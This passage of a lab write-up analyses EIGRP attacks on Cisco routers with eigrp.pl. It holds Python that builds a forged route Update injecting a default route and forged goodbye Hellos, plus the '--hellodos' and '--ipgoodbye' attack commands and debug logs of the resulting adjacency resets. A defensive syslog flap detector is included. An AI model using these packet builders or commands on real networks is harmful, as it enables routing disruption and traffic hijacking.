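

def decode_tlv(ttype: int, body: bytes) -> Dict[str, Any]:
    tlv: Dict[str, Any] = {"type": ttype, "raw": body}
    if ttype == TLV_PARAMETERS and len(body) >= 8:
        tlv.update(k=list(body[:5]), hold_time=struct.unpack("!H", body[6:8])[0])
    elif ttype == TLV_SOFTWARE_VERSION and len(body) >= 4:
        tlv.update(ios_version="%d.%d" % (body[0], body[1]), eigrp_version="%d.%d" % (body[2], body[3]))
    elif ttype == TLV_IPV4_INTERNAL and len(body) >= 20:
        delay, bandwidth = struct.unpack("!II", body[4:12])
        tlv.update(next_hop=".".join(map(str, body[:4])), delay=delay, bandwidth=bandwidth,
                   mtu=int.from_bytes(body[12:15], "big"), hop_count=body[15],
                   reliability=body[16], load=body[17], destinations=[])
        # One metric, then (prefix-length, prefix) pairs until the TLV ends; a prefix takes
        # ceil(len/8) bytes.  Read this way, the forged Update's extra trailing 0x00 is a /0.
        off = 20
        while off < len(body):
            plen, nbytes = body[off], (body[off] + 7) // 8
            raw = body[off + 1:off + 1 + nbytes]
            if len(raw) < nbytes:
                raise ValueError("truncated destination at TLV offset %d" % off)
            tlv["destinations"].append("%s/%d" % (".".join(map(str, raw + b"\x00" * (4 - nbytes))), plen))
            off += 1 + nbytes
    return tlv


def parse_eigrp(pkt: bytes) -> EigrpPacket:
    if len(pkt) < 20:
        raise ValueError("EIGRP header needs 20 bytes, got %d" % len(pkt))
    version, opcode, csum, flags, seq, ack, asn = struct.unpack("!BBHIIII", pkt[:20])
    tlvs, off = [], 20
    while off + 4 <= len(pkt):
        ttype, tlen = struct.unpack("!HH", pkt[off:off + 4])
        if tlen < 4 or off + tlen > len(pkt):
            raise ValueError("bad TLV length %d at offset %d" % (tlen, off))
        tlvs.append(decode_tlv(ttype, pkt[off + 4:off + tlen]))
        off += tlen
    return EigrpPacket(version, opcode, csum, eigrp_checksum(pkt) == csum, flags, seq, ack, asn, tlvs)


def is_goodbye(p: EigrpPacket) -> bool:
    """Graceful shutdown: a Hello whose Parameters TLV has K1..K5 all set to 255."""
    return p.opcode == OPCODE_HELLO and any(
        t["type"] == TLV_PARAMETERS and t.get("k") == [255] * 5 for t in p.tlvs)


def build_tlv(ttype: int, body: bytes) -> bytes:
    return struct.pack("!HH", ttype, 4 + len(body)) + body


def build_eigrp(opcode: int, asn: int, tlvs: bytes, flags: int = 0, seq: int = 0, ack: int = 0) -> bytes:
    pkt = struct.pack("!BBHIIII", 2, opcode, 0, flags, seq, ack, asn) + tlvs
    return pkt[:2] + struct.pack("!H", eigrp_checksum(pkt)) + pkt[4:]


def encode_destination(prefix: str, dest_bytes: Optional[int] = None) -> bytes:
    # RFC encoding is ceil(len/8) address bytes; dest_bytes overrides it to mimic
    # eigrp.pl, which wrote 3 bytes for the /16 in the capture above.
    addr, plen = prefix.split("/")
    n = (int(plen) + 7) // 8 if dest_bytes is None else dest_bytes
    return bytes([int(plen)]) + bytes(int(o) for o in addr.split("."))[:n]


def build_internal_route_tlv(next_hop: str, delay: int, bandwidth: int, mtu: int,
                             hop_count: int, reliability: int, load: int, dests: bytes) -> bytes:
    body = (bytes(int(o) for o in next_hop.split(".")) + struct.pack("!II", delay, bandwidth)
            + mtu.to_bytes(3, "big") + bytes([hop_count, reliability, load]) + b"\x00\x00" + dests)
    return build_tlv(TLV_IPV4_INTERNAL, body)


def forged_update() -> bytes:
    # The injected Update rebuilt from its field values: AS 1, next hop 192.168.1.36.
    tlv = build_internal_route_tlv("192.168.1.36", 12000, 256, 1514, 1, 255, 1,
                                   encode_destination("172.16.0.0/16", dest_bytes=3))
    return build_eigrp(OPCODE_UPDATE, 1, tlv)


def goodbye_hello(asn: int, hold_time: int = 15) -> bytes:
    params = b"\xff" * 5 + b"\x00" + struct.pack("!H", hold_time)
    return build_eigrp(OPCODE_HELLO, asn, build_tlv(TLV_PARAMETERS, params))
```

parse_eigrp(bytes.fromhex(FORGED_UPDATE_HEX)).tlvs[0]["destinations"] comes back as ['172.16.0.0/16', '0.0.0.0/0'] while R1's genuine Update yields only ['172.16.0.0/16']; forged_update() equals the captured bytes, including the 0x017e checksum; and parse_eigrp(goodbye_hello(1)) is reported by is_goodbye.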
Part 4: Attacking EIGRP, method one
On this topic the well-known device hacker FX gave a DoS demonstration long ago but did not publish the technical details. From the background information on this script, the core idea is to flood the EIGRP router with hellos from many spoofed source IPs, so that the target starts looking up all these new neighbours and sets off an ARP storm, eventually bringing down both the network and the device.
Let's test it:
./eigrp.pl --hellodos 192.168.1.0 --source 192.168.1.249
To explain: the hellodos parameter is the subnet of the spoofed sources, and source is the source address of the forged hello.
The screen starts scrolling, counting up from 192.168.1.1; let's look at the routers' reaction:
R0#
*Mar 3 04:49:36.670: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249 (FastEthernet0/0) is down: Remote peer static/dynamic
*Mar 3 04:49:38.178: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249 (FastEthernet0/0) is up: new adjacency
R1#
*Mar 3 04:49:36.166: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251 (FastEthernet0/0) is down: Interface Goodbye received
*Mar 3 04:49:37.762: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251 (FastEthernet0/0) is up: new adjacency
Once the attack traffic goes out, R1 is the first to learn that R0 has gone (Goodbye; an amusing Cisco design, the router has turned into a talker). Its official name is graceful shutdown, something Cisco created in its effort to make EIGRP converge fast: rather than making everyone wait for timers to expire, an EIGRP process that shuts down broadcasts a goodbye telling the other devices not to wait. The question is: what on this network made .251, i.e. R0, send a goodbye? Was it really an ARP DoS?
1. What did the attack script do? Capture on the path out of .36:
Once the pl script is running, the network fills with ARP packets; looking closely, the queried target addresses cycle through 192.168.1.0/24, and after three passes move on to the next /24. The attack source is plainly resolving the MAC addresses of the hosts on the network. That raises a question: by the usual understanding of DoS, one spoofs many source addresses to bombard one or a few specific targets, not a single source against a whole subnet. So the real mechanism behind this option cannot be a flooding denial of service; it must be sending specific packets to the targets that make the router fall over. Sure enough, over several repeated tests R0 went down instantly and regularly, not through slow resource exhaustion, so abnormal packets are the cause.
So what did the script do after it had resolved the addresses of R0 and R1? Capture analysis:
The genuine EIGRP multicast is shown in red, the black lines are the ICMP unreachables coming back, and the light yellow ones are the script's attack packets. In other words, the script sent only two packets in total, because only those two addresses on the network resolved via ARP.
In chronological order (debug ip eigrp, debug ip packet, debug eigrp fsm and debug eigrp packets enabled on the routers; clocks synchronised):
1. At first only the normal hello exchange maintains the neighbours:
R0
Feb 1 07:02:28.057: IP: s=192.168.1.251 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
Feb 1 07:02:28.061: EIGRP: Sending HELLO on FastEthernet0/0
Feb 1 07:02:28.061: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
Feb 1 07:02:29.648: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 07:02:29.656: EIGRP: Received HELLO on FastEthernet0/0 nbr 192.168.1.249
Feb 1 07:02:29.660: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
R1
Feb 1 07:02:28.066: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 07:02:28.074: EIGRP: Received HELLO on FastEthernet0/0 nbr 192.168.1.251
Feb 1 07:02:28.078: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 07:02:29.590: IP: s=192.168.1.249 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
Feb 1 07:02:29.594: EIGRP: Sending HELLO on FastEthernet0/0
Feb 1 07:02:29.594: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
Let's first look at the normal hello packet:
2. Right after that, the script sends the first packet, from .249 to .249:
Its format is completely normal, no different from the router's own hello; the only difference is that the destination is no longer the multicast 224.0.0.10 but a real unicast address.
How does .249 react when it receives it?
R1
Feb 1 07:02:45.562: IP: tableid=0, s=192.168.1.249 (FastEthernet0/0), d=192.168.1.249 (FastEthernet0/0), routed via RIB
Feb 1 07:02:45.562: IP: s=192.168.1.249 (FastEthernet0/0), d=192.168.1.249 (FastEthernet0/0), len 60, rcvd 3
Feb 1 07:02:45.566: EIGRP: Received HELLO on FastEthernet0/0 nbr 192.168.1.249
Feb 1 07:02:45.566: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0
Feb 1 07:02:45.566: EIGRP: Packet from ourselves ignored
R1 processed the packet and ignored it. That tells us two things: first, EIGRP is designed to process unicast hellos; second, this packet is not what caused the router's problem.
3. Next the script sends a packet from .249 to .251.
How does R0 react?
R0
Feb 1 07:02:45.840: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249 (FastEthernet0/0) is down: Remote peer static/dynamic
Feb 1 07:02:45.840: DUAL: linkdown: start – 192.168.1.249 via FastEthernet0/0
Feb 1 07:02:45.848: DUAL: Destination 192.168.0.0/16
Feb 1 07:02:45.848: DUAL: Destination 172.16.0.0/16
Feb 1 07:02:45.848: DUAL: Find FS for dest 172.16.0.0/16. FD is 307200, RD is 307200
Feb 1 07:02:45.848: DUAL: 192.168.1.249 metric 4294967295/4294967295 not found Dmin is 4294967295
Feb 1 07:02:45.848: DUAL: Peer total 0 stub 0 template 0
Feb 1 07:02:45.848: DUAL: Dest 172.16.0.0/16 (No peers) not entering active state.
Feb 1 07:02:45.852: DUAL: Removing dest 172.16.0.0/16, nexthop 192.168.1.249, infosource 192.168.1.249
Feb 1 07:02:45.856: DUAL: No routes. Flushing dest 172.16.0.0/16
Feb 1 07:02:45.864: DUAL: linkdown: finish
...after which renegotiation starts
What is R1 doing meanwhile?
R1
Feb 1 07:02:46.062: Inteface goodbye received
Feb 1 07:02:46.062: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251 (FastEthernet0/0) is down: Interface Goodbye received
Feb 1 07:02:46.062: DUAL: linkdown: start – 192.168.1.251 via FastEthernet0/0
Feb 1 07:02:46.062: DUAL: Destination 192.168.0.0/16
Feb 1 07:02:46.062: DUAL: Destination 172.16.0.0/16
Feb 1 07:02:46.062: DUAL: Destination 172.16.0.0/24
Feb 1 07:02:46.066: DUAL: linkdown: finish
...after which renegotiation starts
It looks as if R1 received R0's goodbye; the capture confirms it:
Indeed.
4. Analysis:
So far it appears that R0 (.251), on receiving a single hello addressed from .249 to .251, immediately declared that neighbour down with the reason "Remote peer static/dynamic" and stopped routing through it; straight after, it sent a goodbye to R1, forcing R1 to tear down its adjacency too.
Cisco had not published EIGRP's internals, so we cannot say exactly what criterion it uses to judge peer stability; what is certain is that this single packet made EIGRP re-converge. The reason string is consistent with IOS distinguishing dynamically discovered neighbours (multicast hellos) from statically configured ones (unicast hellos): a unicast hello from a neighbour that was learned by multicast is treated as a static/dynamic change and the adjacency is reset.
Someone will object: how do you know it was the .249->.251 packet and not the .249->.249 one that caused the collapse? R1 reported the latter as ignored, but it might already have triggered something abnormal that led to the "down" judgement.
I had the same doubt. Fortunately the script has a behaviour its help does not mention: the address given to hellodos sets the start of the range. If we raise the start to .250, no packet to .249 is sent and the question can be tested:
./eigrp.pl --hellodos 192.168.1.250 --source 192.168.1.249
The phenomenon is exactly the same. Here is the full debug output:
R0
Feb 1 07:32:18.353: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 07:32:18.365: EIGRP: Received HELLO on FastEthernet0/0 nbr 192.168.1.249
Feb 1 07:32:18.369: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 07:32:18.509: IP: tableid=0, s=192.168.1.249 (FastEthernet0/0), d=192.168.1.251 (FastEthernet0/0), routed via RIB
Feb 1 07:32:18.513: IP: s=192.168.1.249 (FastEthernet0/0), d=192.168.1.251 (FastEthernet0/0), len 60, rcvd 3
Feb 1 07:32:18.525: EIGRP: Received HELLO on FastEthernet0/0 nbr 192.168.1.249
Feb 1 07:32:18.529: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 07:32:18.533: IP: s=192.168.1.251 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
Feb 1 07:32:18.537: EIGRP: Sending HELLO on FastEthernet0/0
Feb 1 07:32:18.541: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
Feb 1 07:32:18.541: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249 (FastEthernet0/0) is down: Remote peer static/dynamic
Feb 1 07:32:18.545: DUAL: linkdown: start – 192.168.1.249 via FastEthernet0/0
Feb 1 07:32:18.553: DUAL: Destination 192.168.0.0/16
Feb 1 07:32:18.561: DUAL: Destination 172.16.0.0/16
Feb 1 07:32:18.561: DUAL: Find FS for dest 172.16.0.0/16. FD is 307200, RD is 307200
Feb 1 07:32:18.565: DUAL: 192.168.1.249 metric 4294967295/4294967295 not found Dmin is 4294967295
Feb 1 07:32:18.569: DUAL: Peer total 0 stub 0 template 0
Feb 1 07:32:18.569: DUAL: Dest 172.16.0.0/16 (No peers) not entering active state.
Feb 1 07:32:18.573: DUAL: Removing dest 172.16.0.0/16, nexthop 192.168.1.249, infosource 192.168.1.249
Feb 1 07:32:18.577: DUAL: No routes. Flushing dest 172.16.0.0/16
Feb 1 07:32:18.585: DUAL: linkdown: finish
R1
Feb 1 07:32:18.393: IP: s=192.168.1.249 (local), d=224.0.0.10 (FastEthernet0/0), len 60, sending broad/multicast
Feb 1 07:32:18.397: EIGRP: Sending HELLO on FastEthernet0/0
Feb 1 07:32:18.401: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0
Feb 1 07:32:18.917: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 07:32:18.925: EIGRP: Received HELLO on FastEthernet0/0 nbr 192.168.1.251
Feb 1 07:32:18.925: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 07:32:18.925: Inteface goodbye received
Feb 1 07:32:18.925: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251 (FastEthernet0/0) is down: Interface Goodbye received
Feb 1 07:32:18.925: DUAL: linkdown: start – 192.168.1.251 via FastEthernet0/0
Feb 1 07:32:18.925: DUAL: Destination 192.168.0.0/16
Feb 1 07:32:18.925: DUAL: Destination 172.16.0.0/16
Feb 1 07:32:18.925: DUAL: Destination 172.16.0.0/24
Feb 1 07:32:18.925: DUAL: linkdown: finish
But is our current judgement the real underlying cause?
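What a defender would watch for while this is going on: the %DUAL-5-NBRCHANGE lines above, seen on a syslog collector, are enough to catch the attack. The detector below is an added example, not from the page or from any Cisco tool. SAMPLE_LOG is constructed from the neighbour-change lines quoted in this section and the next, prefixed with a router name as a collector would store them, with IOS's spacing left as printed. It pairs each down with the following up of the same adjacency, reports pairs that are only seconds apart, and marks the down reason when it is one of the packet-driven reasons that appear on this page rather than the ordinary "holding time expired". The 30-second default window and the reason list are this example's choices.

```python
"""Flap detector for IOS %DUAL-5-NBRCHANGE syslog lines.

Added example, not from the page or from any Cisco tool.  SAMPLE_LOG is constructed
from the neighbour-change lines shown above, prefixed with the router name the way a
syslog collector records them (spacing kept as IOS printed it).
"""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, Iterable, List, Optional, Tuple

SAMPLE_LOG = [
    "R0 *Mar 3 04:49:36.670:%DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249(FastEthernet0/0) is down: Remote peer static/dynamic",
    "R0 *Mar 3 04:49:38.178: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249 (FastEthernet0/0) is up: new adjacency",
    "R1 *Mar 3 04:49:36.166:%DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251(FastEthernet0/0) is down: Interface Goodbye received",
    "R1 *Mar 3 04:49:37.762: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251 (FastEthernet0/0) is up: new adjacency",
    "R0 Feb 1 08:10:28.302: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249 (FastEthernet0/0) is down: Peer goodbye received",
    "R1 Feb 1 08:10:32.939: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251 (FastEthernet0/0) is down: peer restarted",
    "R0 Feb 1 07:02:45.848: DUAL: Destination 172.16.0.0/16",  # unrelated debug output, must be ignored
]

# Down reasons seen on this page that are caused by a received packet.  The ordinary
# silent-neighbour failure is reported by IOS as "holding time expired" instead.
PEER_DRIVEN_REASONS = {"Remote peer static/dynamic", "Interface Goodbye received",
                       "Peer goodbye received", "peer restarted"}

NBRCHANGE_RE = re.compile(
    r"^(?:(?P<host>[\w.-]+)\s+)?\*?(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2}\.\d{3}):\s*"
    r"%DUAL-5-NBRCHANGE:\s+IP-EIGRP\((?P<vrf>\d+)\)\s+(?P<asn>\d+):\s+"
    r"Neighbor\s*(?P<nbr>\d{1,3}(?:\.\d{1,3}){3})\s*\((?P<iface>[^)]+)\)\s+is\s+"
    r"(?P<state>up|down):\s*(?P<reason>.+?)\s*$")


@dataclass
class NbrEvent:
    host: str
    ts: datetime
    asn: int
    neighbor: str
    iface: str
    state: str
    reason: str


@dataclass
class Flap:
    host: str
    neighbor: str
    iface: str
    reason: str       # reason given on the 'down' line
    seconds: float    # from 'down' to the next 'up' of the same adjacency
    peer_driven: bool


def parse_nbrchange(line: str) -> Optional[NbrEvent]:
    """One syslog line -> NbrEvent, or None if it is not a neighbour-change message."""
    m = NBRCHANGE_RE.match(line)
    if not m:
        return None
    # IOS timestamps carry no year; strptime fills in 1900, which is fine for
    # differences within one capture (a flap spanning New Year would be mis-measured).
    ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S.%f")
    return NbrEvent(m["host"] or "", ts, int(m["asn"]), m["nbr"], m["iface"], m["state"], m["reason"])


def detect_flaps(lines: Iterable[str], window_s: float = 30.0) -> List[Flap]:
    """Pair each 'down' with the next 'up' of the same adjacency on the same host and
    report pairs at most window_s seconds apart.  A 'down' with no following 'up' is
    an outage rather than a flap and is not reported here."""
    pending: Dict[Tuple[str, int, str, str], NbrEvent] = {}
    flaps: List[Flap] = []
    for line in lines:
        ev = parse_nbrchange(line)
        if ev is None:
            continue
        key = (ev.host, ev.asn, ev.neighbor, ev.iface)
        if ev.state == "down":
            pending[key] = ev
        elif key in pending:
            down = pending.pop(key)
            secs = (ev.ts - down.ts).total_seconds()
            if 0 <= secs <= window_s:
                flaps.append(Flap(ev.host, ev.neighbor, ev.iface, down.reason, secs,
                                  down.reason in PEER_DRIVEN_REASONS))
    return flaps


def down_reasons(lines: Iterable[str]) -> Dict[str, int]:
    """Histogram of the reasons on 'down' lines, the quickest triage view."""
    counts: Dict[str, int] = {}
    for line in lines:
        ev = parse_nbrchange(line)
        if ev is not None and ev.state == "down":
            counts[ev.reason] = counts.get(ev.reason, 0) + 1
    return counts


if __name__ == "__main__":
    for f in detect_flaps(SAMPLE_LOG):
        print("%s: %s on %s down for %.3fs (%s%s)" % (f.host, f.neighbor, f.iface, f.seconds,
                                                       f.reason, ", packet-driven" if f.peer_driven else ""))
    print(down_reasons(SAMPLE_LOG))
```

On the sample, both adjacencies are reported as flaps of about a second and a half with packet-driven reasons, which is the signature of this section's attack; the two later downs without an up (Peer goodbye received, peer restarted) still show up in the reason histogram, so neither view alone should be relied on.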
Part 5: Attacking EIGRP, method two
1. Now try the script's second option, ipgoodbye:
./eigrp.pl --ipgoodbye 192.168.1.251 --source 192.168.1.249
Hm? No reaction from the router?
The packet the script sends seems to be wrong; let's look:
2. The opcode value was wrong; change it. (Note by 水煮豆豆: the opcode is the operation code giving the message type. The assignment actually used on the wire, later documented in RFC 7868, is 1 Update, 2 Request, 3 Query, 4 Reply, 5 Hello, 6 IPX-SAP, so opcode 5 is a Hello, which is what everyone's EIGRP captures show; the older list I had, with 4 Hello and 5 IPX-SAP, is simply wrong.)
./eigrp.pl --ipgoodbye 192.168.1.251 --source 192.168.1.249 --opcode=5
Success, re-convergence starts again; a quick look at the data:
Good, no "unknown" this time. Note that the packet the script now sends goes to the multicast address, no longer unicast to .251. Let's see what is inside:
Compared with a normal hello it only has an extra tail, and the IOS version differs (odd: I changed the config file to 12.4, and the packets sent in method one were 12.4, yet here it is always 12.3, so this code path evidently does not read the value from the config file). Now what did the two routers report:
R0
Feb 1 08:10:28.298: EIGRP: Received Goodbye TLV from 192.168.1.249
Feb 1 08:10:28.298: 192.168.1.251
Feb 1 08:10:28.302: address matched
Feb 1 08:10:28.302: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.249 (FastEthernet0/0) is down: Peer goodbye received
Feb 1 08:10:28.306: DUAL: linkdown: start – 192.168.1.249 via FastEthernet0/0
Feb 1 08:10:28.314: DUAL: Destination 192.168.0.0/16
Feb 1 08:10:28.318: DUAL: Destination 172.16.0.0/16
Feb 1 08:10:28.322: DUAL: Find FS for dest 172.16.0.0/16. FD is 307200, RD is 307200
Feb 1 08:10:28.322: DUAL: 192.168.1.249 metric 4294967295/4294967295 not found Dmin is 4294967295
Feb 1 08:10:28.326: DUAL: Peer total 0 stub 0 template 0
Feb 1 08:10:28.330: DUAL: Dest 172.16.0.0/16 (No peers) not entering active state.
Feb 1 08:10:28.334: DUAL: Removing dest 172.16.0.0/16, nexthop 192.168.1.249, infosource 192.168.1.249
Feb 1 08:10:28.338: DUAL: No routes. Flushing dest 172.16.0.0/16
Feb 1 08:10:28.338: DUAL: linkdown: finish
(R0 received the Goodbye, recognised it, and tore down the adjacency accordingly)
R1
Feb 1 08:10:28.264: IP: s=192.168.1.249 (FastEthernet0/0), d=224.0.0.10, len 69, rcvd 2
Feb 1 08:10:28.272: EIGRP: Received HELLO on FastEthernet0/0 nbr 192.168.1.249
Feb 1 08:10:28.276: AS 1, Flags 0x0, Seq 0/0 idbQ 0/0
Feb 1 08:10:28.276: EIGRP: Packet from ourselves ignored
(R1 received the Goodbye packet too, and ignored it)
...
Feb 1 08:10:32.907: IP: tableid=0, s=192.168.1.251 (FastEthernet0/0), d=192.168.1.249 (FastEthernet0/0), routed via RIB
Feb 1 08:10:32.907: IP: s=192.168.1.251 (FastEthernet0/0), d=192.168.1.249 (FastEthernet0/0), len 40, rcvd 3
Feb 1 08:10:32.915: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 60, rcvd 2
Feb 1 08:10:32.915: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 77, rcvd 2
Feb 1 08:10:32.919: IP: s=192.168.1.251 (FastEthernet0/0), d=224.0.0.10, len 40, rcvd 2
Feb 1 08:10:32.931: EIGRP: Received UPDATE . FastEthernet0/0 nbr 192.168.1.251
Feb 1 08:10:32.935: AS 1, Flags 0x1, Seq 45/0 idbQ 0/0 iidbQ un/rely 0/0 peerQ un/rely 0/0
Feb 1 08:10:32.939: %DUAL-5-NBRCHANGE: IP-EIGRP(0) 1: Neighbor 192.168.1.251 (FastEthernet0/0) is down: peer restarted
Feb 1 08:10:32.943: DUAL: linkdown: start - 192.168.1.251 via FastEthernet0/0
Feb 1 08:10:32.951: DUAL: Destination 192.168.0.0/16
Feb 1 08:10:32.951: DUAL: Destination 172.16.0.0/16
Feb 1 08:10:32.951: DUAL: Destination 172.16.0.0/24
Feb 1 08:10:32.955: DUAL: linkdown: finish
(R1 received R0's update, learned that R0 had torn down the adjacency, and so dropped it on its own side as well.)
3. Inference. The script's ipgoodbye parameter really does make R0 believe it received a goodbye, which triggers reconvergence. But the error clearly differs from attack method one: there the cause was the address changing dynamically, whereas here R0 received an explicit goodbye. The point is that this goodbye packet does not carry K values of 255, yet it was still processed as a valid goodbye. R0's debug output explains why: "Received Goodbye TLV ... address matched ... Peer goodbye received" shows that the piece appended after the normal Hello TLVs is a Peer Termination TLV (type 0x0007 in RFC 7868) that lists R0's own address, 192.168.1.251. That is the per-peer goodbye, which IOS logs as "Peer goodbye received", as opposed to the interface goodbye signalled by all-255 K values, which it logs as "Interface Goodbye received".
To verify this we need to modify the lab topology further and test how the same update can be triggered without using the script.
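To make the opcode discussion and the two kinds of goodbye concrete, here is an added example (not from the original post and not from eigrp.pl) that builds EIGRP packets as a receiver would parse them and classifies them. It assumes the classic 20-byte header (version 2, opcode, checksum, flags, sequence, ack, AS number), the Parameters TLV (type 0x0001: K1..K5, reserved, hold time), the Software Version TLV (0x0004) and the presence of the Peer Termination TLV (0x0007); the value bytes placed in that last TLV are a constructed placeholder, since its address-list layout is not decoded here. The AS number 1 and the opcode 4 used for the "wrong opcode" case are assumptions.

```python
"""Build and classify EIGRP Hello/Goodbye packets (the payload carried in
IP protocol 88).  Added example, not code from the lab or from eigrp.pl."""
import struct

EIGRP_VERSION = 2
# Opcodes as actually assigned (RFC 7868), not the mistaken table above.
OPCODES = {1: "UPDATE", 3: "QUERY", 4: "REPLY", 5: "HELLO", 6: "IPX-SAP"}
TLV_PARAMETERS = 0x0001        # K1..K5, reserved, hold time
TLV_SOFTWARE_VERSION = 0x0004  # IOS major/minor, TLV major/minor
TLV_PEER_TERMINATION = 0x0007  # the "Goodbye TLV" named in the IOS debug


def ip_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def tlv(tlv_type: int, value: bytes) -> bytes:
    """Type-Length-Value; the length field covers the 4-byte TLV header too."""
    return struct.pack("!HH", tlv_type, 4 + len(value)) + value


def parameters_tlv(k=(1, 0, 1, 0, 0), hold_time=15) -> bytes:
    return tlv(TLV_PARAMETERS, bytes(k) + b"\x00" + struct.pack("!H", hold_time))


def software_version_tlv(ios=(12, 4), tlv_version=(1, 2)) -> bytes:
    return tlv(TLV_SOFTWARE_VERSION, bytes(ios + tlv_version))


def build_packet(opcode: int, as_number: int, tlvs: bytes = b"",
                 flags: int = 0, seq: int = 0, ack: int = 0) -> bytes:
    """20-byte header (version, opcode, checksum, flags, seq, ack, AS) + TLVs,
    with the checksum computed over the whole packet."""
    header = struct.pack("!BBHIIII", EIGRP_VERSION, opcode, 0, flags, seq, ack, as_number)
    packet = header + tlvs
    return packet[:2] + struct.pack("!H", ip_checksum(packet)) + packet[4:]


def parse_tlvs(body: bytes):
    tlvs, offset = [], 0
    while offset + 4 <= len(body):
        tlv_type, length = struct.unpack("!HH", body[offset:offset + 4])
        if length < 4 or offset + length > len(body):
            raise ValueError("malformed TLV at offset %d" % offset)
        tlvs.append((tlv_type, body[offset + 4:offset + length]))
        offset += length
    if offset != len(body):
        raise ValueError("trailing bytes after the last TLV")
    return tlvs


def classify(packet: bytes) -> str:
    """What a receiver makes of the packet, mirroring the outcomes seen in
    the lab: plain hello, interface goodbye (K=255) and peer goodbye."""
    if len(packet) < 20:
        return "too short"
    if ip_checksum(packet) != 0:          # a valid packet sums to zero
        return "bad checksum"
    version, opcode = packet[0], packet[1]
    if version != EIGRP_VERSION:
        return "unknown version %d" % version
    if opcode != 5:
        return "not a hello: opcode %d (%s)" % (opcode, OPCODES.get(opcode, "unknown"))
    tlvs = parse_tlvs(packet[20:])
    if not tlvs:
        return "ack (hello with no TLVs)"
    if any(t == TLV_PEER_TERMINATION for t, _ in tlvs):
        return "peer goodbye (Peer Termination TLV present)"
    for t, value in tlvs:
        if t == TLV_PARAMETERS and len(value) >= 5 and all(b == 0xFF for b in value[:5]):
            return "interface goodbye (K1..K5 = 255)"
    return "hello"


def demo() -> dict:
    """Constructed packets for AS 1 (assumed) covering the cases above."""
    hello_tlvs = parameters_tlv() + software_version_tlv()
    return {
        "normal": classify(build_packet(5, 1, hello_tlvs)),
        # hello TLVs under opcode 4, assumed to be what the wrong table led to
        "wrong_opcode": classify(build_packet(4, 1, hello_tlvs)),
        "interface_goodbye": classify(build_packet(
            5, 1, parameters_tlv(k=(255,) * 5) + software_version_tlv())),
        # a normal hello plus a trailing Peer Termination TLV; the value bytes
        # are a placeholder, the real address-list layout is not decoded here
        "peer_goodbye": classify(build_packet(
            5, 1, hello_tlvs + tlv(TLV_PEER_TERMINATION, b"\xc0\xa8\x01\xfb"))),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print("%-18s %s" % (name, verdict))
```

The classifier checks the checksum and opcode before it looks at TLVs, which is the order a router follows; that is why a Hello sent with the wrong opcode is rejected before its K values are ever read, and why the script only got results once it used opcode 5.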
6. Modifying the topology to check whether the same behaviour as the attack script can be triggered. The topology is modified as follows:
We insert R3 so that we can enable the addresses .248 and .249 on R3's f0/0 in turn, test the effect on R0 when the interface is brought up and taken down, and confirm from the observed behaviour whether it matches the attack script.
1. 192.168.1.248 joins the network. This simulates the state when a normal neighbor goes offline.
Bringing up R3's f0/0 needs no discussion: it is just one more neighbor negotiation plus the announcement of new networks and routes, and it does not trigger a goodbye, so it is not shown here.
Shutting down R3's f0/0 interface.
R3#clear ip eigrp 1 neighbors
Capture:
